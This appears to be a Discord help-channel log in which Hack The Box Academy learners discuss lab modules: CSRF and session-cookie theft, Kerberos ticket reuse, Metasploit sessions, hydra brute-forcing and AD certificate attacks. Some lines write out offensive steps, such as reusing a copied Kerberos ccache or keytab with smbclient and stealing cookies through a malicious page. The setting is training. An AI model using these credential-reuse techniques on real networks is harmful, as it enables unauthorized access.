Just to reinforce the idea
Generally a session cookie might look like site_session={cookie}
i learned through portswigger and ranakhlil videos but the context they write on get based csrf i am unable to understand, it's like mixing things
I think there's also a language barrier that's further creating a misunderstanding
If you link your app.hackthebox.com account by following #welcome you can ask in #web and someone there can likely better explain it
But in general a malicious html will write any gathered session cookies it grabs to a file so it doesn't have to be intercepted
Or is logged in some way for the attacker to view it
The modules will explain to you so that you understand how it works in an ideal for the hacker situation. Of course there are many factors involved but you will get basic understanding. SSL will make it harder to snoop in on traffic but not entirely impossible
Ssl doesn't matter if the request is being made directly to the malicious page
Since the data won't be encrypted when it arrives
So sniffing is not even a factor
Also none of the sections about it talk about sniffing, they talk about intercepting with burpsuite
True
so after all these things who would an attacker mount the attack if he does not have the csrf token of the victim that they show.
That was my language barrier 😅
They get the victim to send them their token
Also it's *how not *who
That's what the example and setup is showing
The attacker in some way receiving the victim's session token
Usually it's via social engineering
I.e. an email
This is why most organizations at minimum don't show images from outside sources
👍
Or at the very least use some form of screening to prevent it
Intercepting is not the same as sniffing
ohhh wait... is HTB academy different than HTB?
Sniffing is passively listening on the network
Yes
Academy is the learning site
do you have to pay for HTB?
Main site? No
idk bro im legit brand new to everything i started the modules two days ago
All active content is free
@fathom pendant no, so why do they write at the top: Cross-Site Request Forgery (GET-based)
Similar to how we can extract session cookies from applications that do not utilize SSL encryption, we can do the same regarding CSRF tokens included in unencrypted requests.
idk what you mean?
On main site there's active and retired content
Retired requires vip sub to access
Well the normal HTB site is for season and active machines/fortresses, you can look at it like small "pentest". Academy is there to teach you
and in the middle >>>>> they write: Notice that the CSRF token's value above is the same as the CSRF token's value in the captured/"sniffed" request.
Because it's using http as a simple example
ok ok so help me out here... i started everything brand new two days ago and i want to join the army for cybersecurity... what would be the best starting point?
As previous examples were also using http
Not joining the army /hj
Academy best for learning
The main site you can see as practice etc
relax lil bro its what i wanna do so im not in college debt forever
Lmao "Lil bro"
Anyway, academy and its paths are good for learning. I'd also look into DoD specs for cybersec and see the certs they have
Because DoD compliant certs are gonna be what you're going after anyway in the military
@thanks for the help but i think you need to go through the module section
I am
And I'm telling you
They are using http to remain consistent with previous sections, that's it
The same steps can apply even with https as long as there's no other protections in place
SSL just means there's a security cert via some Certificate Authority
It does not mean that it's completely safe
Which is a common misconception
They are using previously established examples that way you don't have to try and think of anything else
Otherwise: the technique is the same
Since nothing about the site had changed aside from adding ssl
however in the get based csrf they used the same way that they use in general csrf, except copy pasting the csrf token and mounting the attack
We keep circling around the point
Point is: it works, the end
If you genuinely want to learn more do research on your own
first talk to a recruiter
Instead of relying on others to partially explain it to you
they never do but if they're going into the army for cybersec might as well ask
Yep
already did, he's a family friend who has a PhD in cybersecurity and speaks 7 languages
And understand asvab scoring
alr took the asvab 🙄
Doesn't mean you understand it
and what did he tell you
Don't know since azure is a subscription
🙂
afaik no cloud content planned but there is an enterprise pro lab for azure ad
Azure is a subscription based thing, so unsure how it would work in the academy environment
no cloud content then :(
Also if you link your account following #welcome @stable bone there's the #careers-and-certs channel which is more apt to ask in
i tried that already but it says i dont exist?
you need an account on the main platform
Because app.hackthebox.com and academy.hackthebox.com are separate accounts technically
Only linked by sso once you sign up
I'm stuck on this last question too.. have you succeeded? Spent +4h and giving up for some help. I've run kinit for LINUX01$ with the keytab found on /etc and exported the ccache under /var/lib but no luck. Any help is appreciated
The linux01$ ticket isn't in tmp
Using an enumeration tool discussed at the end of the section can help you find the ticket
Correct, I used the linikatz
But to kinit with the one found on var lib doesn't work either
Did you kinit with the username?
Yes, LINUX01$
kinit 'linux01$@inlanefreight.htb'
Linux01$ is only the partial name
As noticed with the initial user vector the full username included the domain
david@inlanefreight.htb
Hmm interesting, will try this after a break..
The keytab in etc will work for this
Note* this is how the official writeup did it, I exported the ccache file as my KRB5CCNAME and got it that way
Don't forget with smb stuff using keytab/kerberos auth you need the -k flag
Should I kinit before or after export?
And -N ofc so it doesn't prompt a pw
You don't need to export with kinit
I didn't do kinit and got it with exporting just fine
With smb I was using -k -no-pass too
I'm just going by what i see and what I did ¯\_(ツ)_/¯
Like I said though the kinit likely failed bc you didn't use the full username
Just the partial
Maybe failed silently because I got no err msgs
I'm just curious as to what are the reasons for launching msfconsole as root
First immediate thought is that some ports may be opened that require root
or some exploits too
copied /var/lib/sss/db/ ccache file to /root
export KRB5CCNAME=/root/ ccache file
klist, everything looks valid and correct principal LINUX01$
smbclient //dc01/linux01 -k -N -c "get /flag.txt /root/flag2.txt"
got err: gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_NO_LOGON_SERVERS
session setup failed: NT_STATUS_NO_LOGON_SERVERS
Yeah I understand the ports part but I've always ran it as non root and never had issues with that
the us servers seem to be broken for this module, there was someone earlier who switched to eu2 and it worked
cool, I will try
Weird
Introduction to Web Applications->HTML Injection->'What text would be displayed on the page if we use the following payload as our input: <a href="http://www.hackthebox.com">Click Me</a>' And hint->'Use the full text displayed on the page as the answer "Your ..."'
so i am confused because, as i understood, this is a very old module with that question. But the site changed its content. I remember on the site something like that: "Your journey start here." But i can't find the right sentence, can you give me the answer because i am sure i won't pass that question.
OMG, thank you so much! that was the issue.. bogus VM on US servers. Just finished this LONG LONG LONG module. Also thanks @fathom pendant for sanity check!!!
send a message to support so that they can fix it
sure, their support team is offline but a ticket has been opened
Hey, can you help me please. I also have the decoded output but I think my formatting is wrong. I tried putting the "serial=code", serial=code, code, etc. but nothing seems to be working.
I take it you decoded the output and put that in as the serial yeah?
But the format would be -d "serial={decoded_output}" (without brackets)
As you're sending a post request with data
I decoded the flag and then in the answer i'm typing serial=decoded_code
Yes I'm just asking that you're replacing the decoded_code portion with your output that's all
:)
yes
Ok
It might help to add ;echo after the curl request so you get a new line output
As the response tends to bleed into your line
So you may overlook it
bro guys im so lost how do i get a local version of pwnbox or linux... isnt it literally the same thing as Ubuntu?
Pwnbox is parrot
You can download from https://parrotsec.org
Parrot Security website
isn't the pwnbox a bit customized though?
Yes but it's based on parrot
it keeps telling me to install Linux or pwnbox or wtv but i literally have Ubuntu through the Oracle virtual machine its not the same thing?
Not the same thing. They're all Linux distributions, but they are different. You can do everything you can with a ParrotOS and Kali on Ubuntu, but you'll need to know how to install all the apps (kali and parrot have tons of them already preinstalled). You'll have to do extra leg work to get certain apps working on Ubuntu. Easier to just use kali or the parrot os.
thank you i feel so dumb im brand new to everything 😭
Don't feel that way, everyone had to start somewhere. Everyone learned this from someone at one point.
A session is when you connect to a victim
tyyy marcieee bro is goated
I tried but it is the same output
but for me to use a specific module it wants me to use a session, that doesn't make sense?
Just checked, it's working for me
Well it should have had you connect to a target using some exploit
Literally just checked it works for me
Can i ping u privately maybe my format is still wrong
This looks like a post-exploit
im so lost icl
me literally the last two days
No, the decoding should give you a l337sp34k serial to use
so how do i find what module im gonna use on an ip?
what module is this
what academy module*
using the metasploit framework
framework got me tweakin n shi cuh
Then it's as simple as curl -d "serial=<decoded_output>" http://ip:port/serial.php
Oh the whole thing
Im just typing the middle part
How are you gonna post to nothing and expect a response
What section?
'Sessions & Jobs'
get something to call back to your listener on msfconsole, then you should be able to use that post-exploitation module
Yeah you're lost homie
As the questions refer to the target as running an old version of sudo
Sudo != windows
im on this bit
i got the target specific web application of elFinder and now im on q2.
cant seem to get a shell with the target, that's what i been stuck on
ik some guy yesterday told me to use it
i was confused cuz i nmapped and the shi was runnin on linux

Hello guys, I'm doing (Modern Web Exploitation Techniques —> Second Order Command Injection). I was able to get rce but I don't know where the flag path is to cat it
i have a question... does HTB have employees to answer my dumb questions or is marcie just a goat?
They don't pay me
so youre just on here 24/7 helping ppl?
its always mods i need help not how are the mods
hes investing in us by creating future cybersecurity experts
bro gotta put his stocks elsewhere not on me😭
what do i do here?i rdp like i shouldve
but wha
Damn
marcie go on strike bro
bro dont give him ideas without him we are finished
fr
@fathom pendant dont go on strike you didnt read that forget everything
Just went through as intended and took maybe a few minutes for everything to work :) whoever told you windows was on crack
Don't forget that -V is often most tools way of giving you the version
ye nmap -sV to get the version 
Not for q3
Also the version doesn't matter for q2 there's only 2 relevant possible exploits if you search in msfconsole
Only relevant options are rhosts and lhost
Also spoilers
Also I will always abide by the "don't ask, just do" method
Don't ask until you've tried and it didn't work
i got a session with /var/ww/html/files but what does that mean now? like where am i
ah
had to do shell command
www-data q2 complete - was stuck on it since yesterday 8pm thank u marcie
hey so every time i try to open the parrot file it says "which app you want to open it with" but its only ever some media player, what do i do?
screenshot it
it wont let me it keeps disappearing when i ss
i cant even get into the machine...
ik... but it keeps disappearing...
yes but it keeps going away when i try
ohhh
ok so how do i do that...
cant open machine
what machine u using
oracle
yes it looks just like that
"Can't open machine"
I keep getting the same encoded text after posting "serial=<decoded_output>" 😭
u need to try screenshot and show me
how could someone read this ?
the amd64 iso file is now gone forever i cant find it
https://parrotsec.org/docs/virtualization/install-parrot-on-virtualbox/ did you try to follow this?
I got it now. Thank you
i just get this
It's covered in the intro to windows module iirc
leeme check
windows fundamentals ?
Yeah
I think it's been a minute
If not it's intro to ad
That's the DACL yeah?
Then you look up that error and continue from there
Sounds like file may be corrupted, try downloading again
kerberos Attack
I meant the format
I believe it's one of the acl related things
Ah it's SACL
https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @limber river
i have an issue with rdp too, connects for 1 minute and disconnects for 2 min, that's pretty annoying
tysm 
Are you connected to the vpn?
try single quote to the password
how long u been doing htb before and what was ur hacking experience before that
You need to include the module and section. Maybe you shouldn't be RDPing into a box on the module you're working on, how can we know? Also this:
thanks but this wasn't my issue, however i found it but it gave me (Permission denied\n)
tried sudo and i tried changing the command and it didnt work either
Anyone on Supply Chain Attack's skill assessment?
Yeah
It was working with the other ones before but idk what happened now
I'll try again tomorrow
Hi I’m new to all this can anyone give me some help to improve my skills?
fake pdf 🤨 jk jk just trolling
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@icy jungle
I know these things what should I do next?
you can start with Academy or Starting Point
it's the syntax used for SDDL, Security Descriptor Definition Language.
https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/sddl-for-device-objects
Hi guys! I just finished the Easy skill assessment for Attacking common services. I have a few doubts on some steps on the exploitation, can I DM anyone for guidance?
thank you
ahh @fathom pendant beat me to it!
Silly Microsoft site wouldn't lead me to sddl from DACL/SACL page
So I just went with the first Google result
I have mixed opinions on Bard's summaries
I mostly have been ignoring them 
bard has been absolute ass in my experience
ChatGPT power user here. It just freezes, or runs like crap 50% of the time
but always verify
test in production, never verify, take all the credit when things go right, and blame someone else when something goes wrong. thank you for attending my how to climb the corporate ladder ted talk.
Anyone? 🥹
which is?
Well, I had an issue with the smtp randomly not working (sometimes the user enumeration worked and sometimes it didn't), but i guess that's a connection issue. My main question is how can I know when the hydra bruteforcing is too aggressive and I have to lower the threads
Bc I got really stuck on it until I randomly discovered what happened. I wanna know if there is a way to see if the attack is being too aggressive and therefore the correct password was skipped. Or it is just not yet tried
verbosity can help to see what's being sent but it's mainly just trying out diff threads and seeing what works
Yes but I mean, if I am running hydra on the default settings and obvs don't know the password. I think it is easier to think that the password is not contained in the list rather than go down to 1 thread
Anyways ty for the replies guys ✨🙌🏼
Hahahaha kk ty!!
for the last user to access on the ad attacks skills assessment part ii, ive tried using the tool needed for the first question as the hint for the user indicated that that tool may be needed, but i don't seem to be getting anything out of using that tool, is this a rabbit hole
anyone able to help with windows evasion module aes crypter right at the start?
Btw, just checked it, verbose mode in hydra is the key 😄
Hello everyone, I am new here and to HTB and was wondering if anyone else was having an issue authentication for OpenSSH in the Linux Fundamental: page 17, Service and Process Management? This is the command I am using to start the SSH: systemctl start ssh
am I doing something wrong? When I run that command this is what I am getting:
Authentication is required to start 'ssh.service'.
Multiple identities can be used for authentication:
- Debian (debian)
- ,,, (htb-ac-610980)
Choose identity to authenticate as (1-2):
Then it asks me for a passwd. Not sure what passwd it is asking for. Any help would be greatly appreciated.
Well you don't need to start the ssh service on the pwnbox
It's already running as you can ssh into it from another system
nvm
Also your credentials are stored on the desktop as "credentials"
okay thank you for your help. The first thing it said was I needed to start it so, I was trying to do that. Also, thank you for the information about the credentials, I have a lot to learn.
You don't need to do everything from the modules
Sometimes the examples are just that; examples
Usually the main thing they want you to do is look at the conf file, but I don't recommend messing with the ssh conf file on the pwnbox
As the pwnbox has an exposed interface to the internet
Oh okay, I was just following along with the reading. Roger that, no messing with the ssh conf file.
A lot of stuff is often purely informative
Oh, okay so just read-comprehend-answer the questions. Thank you for the assistance. It has been a long time since I studied and worked this much with computers.
Note taking will be highly beneficial
Is there a preferred method for taking notes besides the "old school" paper and pencil?
Obsidian is a great tool and facilitates copy/paste
Obsidian....I like the sound of that, I will find it and give it a try. Does it work with phones as well or just computers?
hello
there is a mobile app, but if you want your notes to sync between your phone and pc, i think you need to pay
There's no syncing (for free users)
You can get around it by setting up your vault as a cloud location like Google drive
verify your account -> #welcome
Read and follow #welcome
oh okay. thanks
what about using One Drive think that will work?
🤫
Hi there, I'm working on the PK1 - ESC1 and I'm a little stuck in the part when I need to request a kerberos TGT on Rubeus
The client mismatch comes from the certificate provided or the user who requested?
what module?
Windows Attacks & Defense/PK1-ESC1
i haven't done that module so someone else can probably chime in and give you a better answer, but generally i think that error will happen due to incorrect SPN provided in the TGS request, the username is wrong or doesn't exist, or wrong domain
it looks like you're trying to auth via a local admin account, which is probably why
local accounts are managed by SAM on individual computers not the DC
oh looking again maybe it's not a local account. still probably one of those things i mentioned.
unless the administrator acc has a tgt
if it's the domain admin yeah, but not the local admin
yup pretty sure u can see which acc has a tgt via rubeus and mimikatz
if u have local admin rights
Well, in the exercise we find the certificate template through "Certify", then request the certificate of the Administrator on Certify again
Then I end up with Certificate and Private key.
the certificate is a PEM and I converted to PFX, that certificate is the one provided to Rubeus to request the TGT
[NTLM RELAY ATTACKS - SKILLS ASSESSMENT]
Hey guys!
Currently working on skill assessment here and got stuck on second question.
Can I have a nudge?
check for ESC
Can I DM to you?
sure
